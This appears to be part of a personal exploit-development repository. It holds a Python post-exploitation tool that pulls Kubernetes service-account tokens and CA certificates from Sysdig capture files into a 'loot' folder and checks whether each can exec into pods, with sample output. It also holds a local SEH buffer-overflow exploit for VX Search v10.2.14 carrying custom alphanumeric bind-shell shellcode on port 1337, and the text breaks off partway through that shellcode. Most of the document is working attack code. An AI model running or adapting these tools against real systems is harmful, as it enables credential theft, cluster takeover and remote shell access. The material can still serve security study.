-------------------------------------------------------------------------------- /Personal-Exploits/Sysdig Monitor - Kubernetes Post Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Sysdig-Extract 2 | 3 | This script will attempt to extract the following from a SysDig `.scap` capture file. 4 | 5 | - API Endpoint 6 | - API Endpoint Port 7 | - Account Tokens 8 | - Account CA Certificates 9 | 10 | Once found an attempt will be made to exec into a pod with each token and ca.crt. For best results use a capture size of 1800. 11 | 12 | ## Usage Example 13 | 14 | ``` 15 | root@wetw0rk:~$ ./sysdig_extract.py half_hour_cap.scap 16 | [+] endpoint found: https://XXX.XXXXX.XXXXXX.XXXXX.XXXXX.com 17 | [+] possible endpoint port located XXXXX 18 | [+] possible endpoint port located XXXXX 19 | [+] summary of findings shown below (false positives in red) 20 | ACCOUNT TOKEN PROOF CERT PROOF 21 | kube-dns-token-XXXXX eyJhbGci BEGIN CERTIFICATE 22 | default-token-XXXXX eyJhbGci BEGIN CERTIFICATE 23 | kubernetes.io eyJhbGci BEGIN CERTIFICATE 24 | heapster-token-XXXXX eyJhbGci BEGIN CERTIFICATE 25 | sysdig-agent-token-XXXXX eyJhbGci BEGIN CERTIFICATE 26 | kube-dns-autoscaler-token-XXXXX eyJhbGci BEGIN CERTIFICATE 27 | XXXXXX-kube-fluentd-token-XXXXX eyJhbGci BEGIN CERTIFICATE 28 | kubernetes-dashboard-token-XXXXX eyJhbGci BEGIN CERTIFICATE 29 | etcd-certs eyJhbGci BEGIN CERTIFICATE 30 | XXXX-keepalived-watcher-token-XXXX eyJhbGci BEGIN CERTIFICATE 31 | calico-node-token-XXXXX eyJhbGci BEGIN CERTIFICATE 32 | sysdig-agent-token-XXXXX eyJhbGci BEGIN CERTIFICATE 33 | calico-kube-controllers-token-XXXXX eyJhbGci BEGIN CERTIFICATE 34 | system.slice eyJhbGci BEGIN CERTIFICATE 35 | kubernetes.io~secret eyJhbGci BEGIN CERTIFICATE 36 | sysdig-agent-config eyJhbGci BEGIN CERTIFICATE 37 | sysdig-agent-secrets eyJhbGci BEGIN CERTIFICATE 38 | terminfo eyJmc BEGIN CERTIFICATE 39 | ACCOUNT TOKEN PROOF CERT PROOF 40 | [M eyJhbGci BEGIN CERTIFICATE 41 | {"pid":13743,"level":"info","m eyJhbGci BEGIN CERTIFICATE 42 | 20XX-XX-XX 1Y:33:53.690, 13738 eyJhbGci BEGIN CERTIFICATE 43 | eyJhbGci BEGIN CERTIFICATE 44 | 20XX-XX-XX 1Y:39:53.688, 13738 eyJhbGci BEGIN CERTIFICATE 45 | XX> eyJhbGci BEGIN CERTIFICATE 46 | X eyJhbGci BEGIN CERTIFICATE 47 | 20XX-XX-XX 1Y:57:53.674, 13738 eyJhbGci BEGIN CERTIFICATE 48 | [+] extracting findings into "loot" directory 49 | [-] previously discovered entry: 50 | [*] starting exec checks on all discovered accounts 51 | [*] using https://XXX.XXXXX.XXXXXX.XXXXX.XXXXX.com:XXX as our target endpoint (if fails try other possible ports) 52 | [+] summary of findings shown below 53 | ACCOUNT CAN EXEC 54 | sysdig-agent-token-XXXXX no 55 | default-token-XXXXX yes 56 | etcd-certs no 57 | sysdig-agent-config no 58 | sysdig-agent-token-XXXXX no 59 | XXXX-kube-fluentd-token-XXXXX ERROR 60 | XXXX-keepalived-watcher-token-X no 61 | heapster-token-XXXXX ERROR 62 | system.slice ERROR 63 | terminfo ERROR 64 | kube-dns-autoscaler-token-XXXX no 65 | calico-node-token-XXXXX no 66 | kubernetes.io~secret no 67 | kube-dns-token-XXXXX ERROR 68 | kubernetes.io no 69 | calico-kube-controllers-token- no 70 | sysdig-agent-secrets no 71 | kubernetes-dashboard-token-XXX no 72 | ACCOUNT CAN EXEC 73 | [M no 74 | 20XX-XX-XX 1Y:39:53.688, 13738 ERROR 75 | 20XX-XX-XX 1Y:57:53.674, 13738 no 76 | XX ERROR 77 | {"pid":13743,"level":"info","m no 78 | X no 79 | 20XX-XX-XX 1Y:33:53.690, 13738 no 80 | 81 | ``` 82 | -------------------------------------------------------------------------------- /Personal-Exploits/Sysdig Monitor - Kubernetes Post Exploitation/sysdig_extract.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # MIT License 4 | # 5 | # Copyright (c) 2019 Milton Valencia 6 | # 7 | # Permission is hereby granted, free of charge, to any person obtaining a copy 8 | # of this software and associated documentation files (the "Software"), to deal 9 | # in the Software without restriction, including without limitation the rights 10 | # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | # copies of the Software, and to permit persons to whom the Software is 12 | # furnished to do so, subject to the following conditions: 13 | # 14 | # The above copyright notice and this permission notice shall be included in all 15 | # copies or substantial portions of the Software. 16 | # 17 | # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | # SOFTWARE. 24 | # 25 | # Script name : sysdig_extract.py 26 | # Version : 1.0 27 | # Created date : 3/26/19 28 | # Last update : 3/27/19 29 | # Author : Milton Valencia (wetw0rk) 30 | # Python version : 3.5 31 | # Designed OS : Linux (preferably a penetration testing distro) 32 | # 33 | # Description : 34 | # This script will attempt to extract the following from a SysDig `.scap` 35 | # capture file. 36 | # - API Endpoint 37 | # - API Endpoint Port 38 | # - Account Tokens 39 | # - Account CA Certificates 40 | # Once found an attempt will be made to exec into a pod with each token/ca 41 | # 42 | # Tested on: 43 | # Sysdig 0.24.2 44 | # running "file" should output: pcap-ng capture file - version 1.2 45 | # 46 | # Dependencies : 47 | # None 48 | # 49 | 50 | import os 51 | import sys 52 | import socket 53 | import subprocess 54 | 55 | # pcb: print colors and banners 56 | class pcb: 57 | RED = "\033[;1m\033[1;91m" 58 | BLUE = "\033[;1m\033[1;94m" 59 | GREEN = "\033[;1m\033[0;92m" 60 | ENDC = "\033[0;0m" 61 | ERROR = "\033[;1m\033[1;91m[-]\033[0;0m" 62 | GOOD = "\033[;1m\033[0;92m[+]\033[0;0m" 63 | INFO = "\033[;1m\033[1;94m[*]\033[0;0m" 64 | 65 | # sysdig_extractor: extraction class for sensitive data 66 | class sysdig_extractor(): 67 | 68 | def __init__(self, filename): 69 | self.filename = subprocess.Popen(['strings', filename], stdout=subprocess.PIPE).communicate()[0] 70 | self.findings = {} 71 | self.endpoint = "" 72 | self.ports = [] 73 | 74 | def extract_tokens_cert(self): 75 | CH = \ 76 | [ 77 | "-----BEGIN CERTIFICATE-----", 78 | "-----END CERTIFICATE-----" 79 | ] 80 | self.filename = self.filename.decode("utf-8") 81 | lines = self.filename.split('\n') 82 | ef = 0 83 | 84 | for i in range(len(lines)): 85 | ''' 86 | Extract leaked tokens 87 | ''' 88 | if lines[i].startswith("eyJ"): 89 | token_name = lines[i-1].rstrip('\n').split('/') 90 | try: 91 | self.findings[token_name[len(token_name)-3]] = [lines[i].rstrip('\n')] 92 | except: 93 | pass 94 | ''' 95 | Extract full certificate 96 | ''' 97 | full_cert = "" 98 | j = i 99 | try: 100 | while (lines[j].rstrip('\n') != CH[0]): 101 | j += 1 102 | while (lines[j].rstrip('\n') != CH[1]): 103 | full_cert += lines[j] + "\n" 104 | if (len(lines[j].rstrip('\n')) < 24): 105 | full_cert = "" 106 | break 107 | j += 1 108 | except: 109 | print("%s error with extraction of cert" % pcb.ERROR) 110 | continue 111 | # assign cert to owner 112 | if (lines[j].rstrip('\n') == CH[1]): 113 | full_cert += lines[j] + "\n" 114 | try: 115 | self.findings[token_name[len(token_name)-3]] += full_cert, 116 | except: 117 | pass 118 | ''' 119 | Locate API endpoint, and possible port 120 | ''' 121 | if (("masteretcdfrontend" in lines[i]) and ef == 0): 122 | l = lines[i] 123 | self.endpoint = l.split(" ")[l.split(" ").index("masteretcdfrontend")+1].split("/")[1] 124 | print("{:s} endpoint found: https://{:s}".format(pcb.GOOD, self.endpoint)) 125 | ef = 1 126 | if (("conntrack_entry" in lines[i]) and ("dst=\"{:s}\"".format(socket.gethostbyname(self.endpoint)) in lines[i])): 127 | l = lines[i] 128 | self.ports += l.split(" ")[len(l.split(" "))-1].split(",")[1], 129 | 130 | self.find_endpoint() 131 | 132 | print("%s summary of findings shown below (false positives in red)" % pcb.GOOD) 133 | print("\t{:s}{:<40} {:<15} {:<15}{:s}".format(pcb.BLUE, "ACCOUNT", "TOKEN PROOF", "CERT PROOF", pcb.ENDC)) 134 | list_r = [] 135 | for k, v in self.findings.items(): 136 | try: 137 | c = k[0] 138 | except: 139 | c = "{" 140 | # carve out false positives or invalid data 141 | if ((c >= 'A' and c <= 'Z' or c >= 'a' and c <= 'z') and (len(k) >= 4)): 142 | try: 143 | print("\t{:<40} {:<15} {:<15}".format(k, v[0][0:8], v[1][5:22])) 144 | except: 145 | print("\t{:<40} {:<15} {:<15}".format(k, v[0][0:8], "NULL")) 146 | else: 147 | try: 148 | list_r += "\t{:<40} {:<15} {:<15}".format(k[0:30], v[0][0:8], v[1][5:22]), 149 | except: 150 | list_r += "\t{:<40} {:<15} {:<15}".format(k[0:30], v[0][0:8], "NULL"), 151 | print("\t{:s}{:<40} {:<15} {:<15}{:s}".format(pcb.RED, "ACCOUNT", "TOKEN PROOF", "CERT PROOF", pcb.ENDC)) 152 | for i in range(len(list_r)): 153 | print(list_r[i]) 154 | 155 | self.write_and_test() 156 | return 157 | 158 | def find_endpoint(self): 159 | fd = open("tmp_log.txt", "w") 160 | self.ports = list(set(self.ports)) 161 | cf = "" 162 | for i in range(len(self.ports)): 163 | fd = open("tmp_log.txt", "w") 164 | try: 165 | c = int(self.ports[i]) 166 | except: 167 | c = "Invalid" 168 | 169 | if (c != "Invalid"): 170 | cmd = 'kubectl --token=L --certificate-authority=tmp_log.txt --server={:s}:{:s} get pods'.format( 171 | self.endpoint, self.ports[i] 172 | ) 173 | try: 174 | o = subprocess.check_output([cmd], shell=True, stderr=fd, timeout=1) 175 | except: 176 | pass 177 | fd.close() 178 | fd = open("tmp_log.txt", "r") 179 | r = fd.read() 180 | if ("timeout" in r): 181 | pass 182 | else: 183 | print("\t{:s} possible endpoint port located {:s}".format(pcb.GOOD, self.ports[i])) 184 | cf = self.ports[i] 185 | fd.close() 186 | os.system("rm tmp_log.txt") 187 | self.endpoint = "https://{:s}:{:s}".format(self.endpoint, cf) 188 | return 189 | 190 | def write_and_test(self): 191 | print("%s extracting findings into \"loot\" directory" % pcb.GOOD) 192 | try: 193 | os.mkdir("loot") 194 | except: 195 | print("%s directory exists continuing exfiltration" % pcb.INFO) 196 | os.chdir("loot") 197 | for k, v in self.findings.items(): 198 | try: 199 | os.mkdir(k) 200 | os.chdir(k) 201 | try: 202 | maybe = v[1] 203 | fd = open("token", "w") 204 | fd.write(v[0]) 205 | fd.close() 206 | fd = open("ca.crt", "w") 207 | fd.write(maybe) 208 | fd.close() 209 | except: 210 | fd = open("token", "w") 211 | fd.write(v[0]) 212 | fd.close() 213 | os.chdir("..") 214 | except: 215 | print("%s previously discovered entry: %s" % (pcb.ERROR, k)) 216 | 217 | self.check_exec() 218 | return 219 | 220 | def check_exec(self): 221 | print("%s starting exec checks on all discovered accounts" % pcb.INFO) 222 | print("%s using %s as our target endpoint (if fails try other possible ports)" % (pcb.INFO, self.endpoint)) 223 | accounts = os.listdir('.') 224 | 225 | print("%s summary of findings shown below" % pcb.GOOD) 226 | print("\t{:s}{:<40} {:<15}{:s}".format(pcb.BLUE,"ACCOUNT", "CAN EXEC", pcb.ENDC)) 227 | list_r = [] 228 | devnull = open(subprocess.os.devnull, 'w') 229 | for i in range(len(accounts)): 230 | os.chdir(accounts[i]) 231 | c = os.getcwd().split("/")[len(os.getcwd().split("/"))-1] 232 | cmd = ("kubectl --token=`cat token` --certificate-authority=ca.crt" 233 | " --server={:s} auth can-i exec pods" 234 | ).format(self.endpoint) 235 | try: 236 | o = subprocess.check_output([cmd], shell=True, stderr=devnull) 237 | except: 238 | o = "ERROR" 239 | pass 240 | 241 | # decode response only ignore str object 242 | try: 243 | o = o.decode("utf-8") 244 | except: 245 | pass 246 | 247 | if (o.rstrip("\n") == 'yes' or o.rstrip("\n") == 'no'): 248 | r = o.rstrip("\n") 249 | else: 250 | r = "ERROR" 251 | 252 | if ((c[0] >= 'A' and c[0] <= 'Z' or c[0] >= 'a' and c[0] <= 'z') and (len(c) >= 4)): 253 | print("\t{:<40} {:<15}".format(c[0:30], r)) 254 | else: 255 | list_r += ("\t{:<40} {:<15}".format(c[0:30], r)), 256 | os.chdir('..') 257 | devnull.close() 258 | 259 | print("\t{:s}{:<40} {:<15}{:s}".format(pcb.RED,"ACCOUNT", "CAN EXEC", pcb.ENDC)) 260 | for i in range(len(list_r)): 261 | print(list_r[i]) 262 | 263 | return 264 | 265 | def main(): 266 | try: 267 | exfil = sysdig_extractor(sys.argv[1]) 268 | exfil.extract_tokens_cert() 269 | except: 270 | print("usage: %s file.scap" % (sys.argv[0])) 271 | exit() 272 | 273 | main() 274 | 275 | -------------------------------------------------------------------------------- /Personal-Exploits/VXSearch v10.2.14 - Local Code Execution/README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | VX Search v10.2.14 suffers from a local buffer overflow. The following exploit will generate a bind shell on port 1337. 4 | 5 | ## Exploitation Example 6 | 7 | ![alt text](https://github.com/wetw0rk/Exploit-Development/blob/master/Personal-Exploits/VXSearch%20v10.2.14%20-%20Local%20Code%20Execution/images/Proof.png) 8 | -------------------------------------------------------------------------------- /Personal-Exploits/VXSearch v10.2.14 - Local Code Execution/images/Proof.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wetw0rk/Exploit-Development/cf3d587e537c594413efa98bcd4ac20154874cf6/Personal-Exploits/VXSearch v10.2.14 - Local Code Execution/images/Proof.png -------------------------------------------------------------------------------- /Personal-Exploits/VXSearch v10.2.14 - Local Code Execution/vxSearchSploitWin7.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # Exploit Title : VXSearch v10.2.14 Local SEH Overflow 4 | # Date : 11/16/2017 5 | # Exploit Author : wetw0rk 6 | # Vendor Homepage : http://www.flexense.com/ 7 | # Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe 8 | # Version : 10.2.14 9 | # Tested on : Windows 7 (x86) 10 | # Description : VX Search v10.2.14 suffers from a local buffer overflow. The 11 | # following exploit will generate a bind shell on port 1337. I 12 | # was unable to get a shell working with msfvenom shellcode so 13 | # below is a custom alphanumeric bind shell. Greetz rezkon ;) 14 | # 15 | # trigger the vulnerability by : 16 | # Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name 17 | # 18 | 19 | import struct 20 | 21 | shellcode = "w00tw00t" 22 | shellcode += ( 23 | "\x25\x4a\x4d\x4e\x55" # and eax, 0x554e4d4a 24 | "\x25\x35\x32\x31\x2a" # and eax, 0x2a313235 25 | "\x2d\x6a\x35\x35\x35" # sub eax, 0x3535356a 26 | "\x2d\x65\x6a\x6a\x65" # sub eax, 0x656a6a65 27 | "\x2d\x61\x64\x4d\x65" # sub eax, 0x654d6461 28 | "\x50" # push eax 29 | "\x5c" # pop esp 30 | ) 31 | shellcode += ( 32 | "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4f\x4f\x4f\x4f" 33 | "\x2d\x4f\x30\x4f\x68\x2d\x62\x2d\x62\x72\x50\x25\x4a\x4d\x4e" 34 | "\x55\x25\x35\x32\x31\x2a\x2d\x76\x57\x57\x63\x2d\x77\x36\x39" 35 | "\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x54" 36 | "\x54\x54\x2d\x25\x54\x7a\x2d\x2d\x25\x52\x76\x36\x50\x25\x4a" 37 | "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x35\x49\x49\x2d\x49" 38 | "\x25\x49\x69\x2d\x64\x25\x72\x6c\x50\x25\x4a\x4d\x4e\x55\x25" 39 | "\x35\x32\x31\x2a\x2d\x70\x33\x33\x25\x2d\x70\x25\x70\x25\x2d" 40 | "\x4b\x6a\x56\x39\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" 41 | "\x2d\x79\x55\x75\x32\x2d\x79\x75\x75\x55\x2d\x79\x77\x77\x78" 42 | "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x4a\x4a" 43 | "\x25\x2d\x39\x5f\x4d\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" 44 | "\x31\x2a\x2d\x4b\x57\x4b\x57\x2d\x70\x76\x4b\x79\x2d\x70\x76" 45 | "\x78\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49" 46 | "\x49\x49\x49\x2d\x49\x4e\x64\x49\x2d\x78\x25\x78\x25\x2d\x6f" 47 | "\x25\x7a\x48\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" 48 | "\x58\x58\x38\x58\x2d\x58\x30\x32\x58\x2d\x51\x46\x2d\x47\x50" 49 | "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5f\x52\x5f\x5f" 50 | "\x2d\x5f\x25\x25\x35\x2d\x62\x39\x25\x25\x50\x25\x4a\x4d\x4e" 51 | "\x55\x25\x35\x32\x31\x2a\x2d\x4a\x4a\x4a\x4a\x2d\x4a\x4a\x4a" 52 | "\x4a\x2d\x79\x39\x4a\x79\x2d\x6d\x32\x4b\x68\x50\x25\x4a\x4d" 53 | "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x30\x71\x30\x2d\x30\x25" 54 | "\x71\x30\x2d\x38\x31\x51\x5f\x50\x25\x4a\x4d\x4e\x55\x25\x35" 55 | "\x32\x31\x2a\x2d\x32\x32\x32\x32\x2d\x78\x77\x7a\x77\x50\x25" 56 | "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x62\x62\x62\x62\x2d" 57 | "\x48\x57\x47\x4f\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" 58 | "\x2d\x76\x76\x4f\x4f\x2d\x36\x39\x5a\x5a\x50\x25\x4a\x4d\x4e" 59 | "\x55\x25\x35\x32\x31\x2a\x2d\x61\x61\x61\x61\x2d\x4a\x61\x4a" 60 | "\x25\x2d\x45\x77\x53\x35\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" 61 | "\x31\x2a\x2d\x63\x63\x63\x63\x2d\x39\x63\x63\x2d\x2d\x32\x63" 62 | "\x7a\x25\x2d\x31\x49\x7a\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35" 63 | "\x32\x31\x2a\x2d\x72\x79\x79\x79\x2d\x25\x30\x25\x30\x2d\x25" 64 | "\x32\x25\x55\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" 65 | "\x58\x58\x41\x58\x2d\x58\x58\x25\x77\x2d\x6e\x51\x32\x69\x50" 66 | "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x48\x77\x38\x48" 67 | "\x2d\x4e\x76\x6e\x61\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" 68 | "\x2a\x2d\x41\x41\x6e\x6e\x2d\x31\x31\x30\x6e\x2d\x37\x36\x30" 69 | "\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x38\x38" 70 | "\x38\x38\x2d\x38\x79\x38\x25\x2d\x38\x79\x38\x25\x2d\x58\x4c" 71 | "\x73\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x61" 72 | "\x52\x61\x52\x2d\x37\x4a\x31\x49\x50\x25\x4a\x4d\x4e\x55\x25" 73 | "\x35\x32\x31\x2a\x2d\x4d\x47\x4d\x4d\x2d\x30\x25\x4d\x6b\x2d" 74 | "\x36\x32\x66\x71\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" 75 | "\x2d\x36\x43\x43\x6c\x2d\x33\x54\x47\x25\x50\x25\x4a\x4d\x4e" 76 | "\x55\x25\x35\x32\x31\x2a\x2d\x4c\x4c\x4c\x4c\x2d\x6e\x4c\x6e" 77 | "\x36\x2d\x65\x67\x6f\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" 78 | "\x31\x2a\x2d\x25\x25\x4b\x4b\x2d\x25\x25\x6f\x4b\x2d\x4e\x41" 79 | "\x59\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41" 80 | "\x41\x41\x41\x2d\x52\x52\x78\x41\x2d\x6e\x6c\x70\x25\x50\x25" 81 | "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x6c\x30\x30\x2d" 82 | "\x30\x6c\x6c\x30\x2d\x38\x70\x79\x66\x50\x25\x4a\x4d\x4e\x55" 83 | "\x25\x35\x32\x31\x2a\x2d\x42\x70\x70\x45\x2d\x32\x45\x70\x31" 84 | "\x2d\x25\x4b\x49\x31\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" 85 | "\x2a\x2d\x25\x50\x50\x50\x2d\x25\x7a\x72\x25\x2d\x4e\x73\x61" 86 | "\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x77" 87 | "\x74\x74\x2d\x61\x78\x35\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35" 88 | "\x32\x31\x2a\x2d\x30\x30\x30\x30\x2d\x30\x30\x59\x30\x2d\x30" 89 | "\x30\x74\x51\x2d\x6b\x36\x79\x67\x50\x25\x4a\x4d\x4e\x55\x25" 90 | "\x35\x32\x31\x2a\x2d\x75\x38\x43\x43\x2d\x7a\x31\x43\x43\x2d" 91 | "\x7a\x2d\x77\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" 92 | "\x2d\x59\x59\x59\x59\x2d\x59\x59\x59\x59\x2d\x6f\x6c\x4d\x77" 93 | "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45" 94 | "\x45\x2d\x34\x2d\x76\x45\x2d\x37\x25\x5a\x65\x50\x25\x4a\x4d" 95 | "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x34\x34\x34\x34\x2d\x62\x34" 96 | "\x34\x34\x2d\x6d\x56\x47\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35" 97 | "\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x76\x2d\x2d\x76\x2d\x55" 98 | "\x4c\x55\x7a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" 99 | "\x77\x77\x77\x30\x2d\x47\x47\x79\x30\x2d\x42\x42\x39\x34\x50" 100 | "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x75\x36\x51" 101 | "\x2d\x42\x61\x49\x43\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" 102 | "\x2a\x2d\x56\x56\x31\x56\x2d\x31\x79\x31\x25\x2d\x50\x6c\x48" 103 | "\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x72\x72" 104 | "\x72\x72\x2d\x72\x25\x38\x38\x2d\x38\x25\x25\x25\x2d\x54\x41" 105 | "\x30\x30\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47" 106 | "\x47\x47\x76\x2d\x47\x47\x76\x76\x2d\x6b\x72\x6c\x5a\x50\x25" 107 | "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x71\x25\x71\x2d" 108 | "\x73\x42\x63\x68\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" 109 | "\x2d\x48\x55\x51\x51\x2d\x45\x78\x4f\x5a\x50\x25\x4a\x4d\x4e" 110 | "\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45\x32\x2d\x45\x45\x25" 111 | "\x31\x2d\x76\x75\x2d\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" 112 | "\x31\x2a\x2d\x6e\x4f\x6d\x6e\x2d\x35\x48\x5f\x5f\x50\x25\x4a" 113 | "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x71" 114 | "\x2d\x2d\x71\x2d\x71\x2d\x4a\x71\x2d\x66\x65\x70\x62\x50\x25" 115 | "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x30\x56\x30\x2d" 116 | "\x56\x38\x25\x30\x2d\x74\x37\x25\x45\x50\x25\x4a\x4d\x4e\x55" 117 | "\x25\x35\x32\x31\x2a\x2d\x32\x32\x32\x77\x2d\x32\x32\x32\x32" 118 | "\x2d\x43\x41\x4a\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" 119 | "\x2a\x2d\x63\x63\x63\x30\x2d\x79\x41\x41\x6e\x50\x25\x4a\x4d" 120 | "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4b\x4b\x4b\x4b\x2d\x4b\x4b" 121 | "\x25\x31\x2d\x4b\x71\x25\x32\x2d\x4f\x6e\x25\x2d\x50\x25\x4a" 122 | "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x37\x37\x37\x2d\x6d" 123 | "\x37\x6d\x37\x2d\x6d\x37\x6d\x37\x2d\x64\x55\x63\x58\x50\x25" 124 | "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x44\x6c\x6c\x6c\x2d" 125 | "\x34\x44\x44\x6c\x2d\x30\x33\x4e\x54\x50\x25\x4a\x4d\x4e\x55" 126 | "\x25\x35\x32\x31\x2a\x2d\x2d\x7a\x43\x2d\x2d\x48\x79\x71\x47" 127 | "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41" 128 | "\x41\x2d\x41\x46\x71\x25\x2d\x5a\x77\x7a\x32\x50\x25\x4a\x4d" 129 | "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47\x47\x47\x47\x2d\x47\x6e" 130 | "\x47\x6e\x2d\x47\x78\x6e\x78\x2d\x47\x79\x77\x79\x50\x25\x4a" 131 | "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x38\x69\x38\x2d\x51" 132 | "\x4a\x72\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" 133 | "\x79\x79\x30\x79\x2d\x4d\x4d\x2d\x4d\x2d\x44\x35\x25\x41\x50" 134 | "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x6f\x6f\x6f\x31" 135 | "\x2d\x74\x25\x6f\x33\x2d\x56\x32\x41\x25\x50\x25\x4a\x4d\x4e" 136 | "\x55\x25\x35\x32\x31\x2a\x2d\x54\x54\x54\x54\x2d\x72\x72\x54" 137 | "\x54\x2d\x79\x69\x49\x56\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" 138 | "\x31\x2a\x2d\x70\x70\x70\x70\x2d\x70\x25\x5a\x70\x2d\x4a\x38" 139 | "\x36\x72\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x6d" 140 | "\x6d\x6d\x6d\x2d\x6d\x6d\x6d\x46\x2d\x48\x76\x74\x25\x2d\x53" 141 | "\x7a\x25\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" 142 | "\x7a\x7a\x7a\x43\x2d\x49\x43\x25\x43\x2d\x25\x5f\x25\x30\x50" 143 | "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x51\x51\x51\x51" 144 | "\x2d\x51\x51\x51\x70\x2d\x38\x51\x61\x7a\x2d\x25\x39\x70\x7a" 145 | "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x44\x37" 146 | "\x6c\x2d\x78\x30\x6f\x73\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" 147 | "\x31\x2a\x2d\x44\x25\x25\x44\x2d\x76\x25\x76\x76\x2d\x63\x6c" 148 | "\x63\x74\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x42" 149 | "\x47\x74\x4e\x2d\x33\x6c\x7a\x39\x50\x25\x4a\x4d\x4e\x55\x25" 150 | "\x35\x32\x31\x2a\x2d\x7a\x30\x66\x7a\x2d\x76\x44\x4f\x49\x50" 151 | "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41\x41" 152 | "\x2d\x6d\x67\x33\x6c\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" 153 | "\x2a\x2d\x51\x51\x51\x51\x2d\x65\x71\x51\x51\x2d\x49\x76\x7a" 154 | "\x6a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x4a" 155 | "\x42\x35\x2d\x35\x7a\x7a\x42\x2d\x76\x7a\x73\x7a\x50\x25\x4a" 156 | "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x25\x35\x35\x2d\x35" 157 | "\x25\x76\x35\x2d\x35\x39\x52\x69\x50\x25\x4a\x4d\x4e\x55\x25" 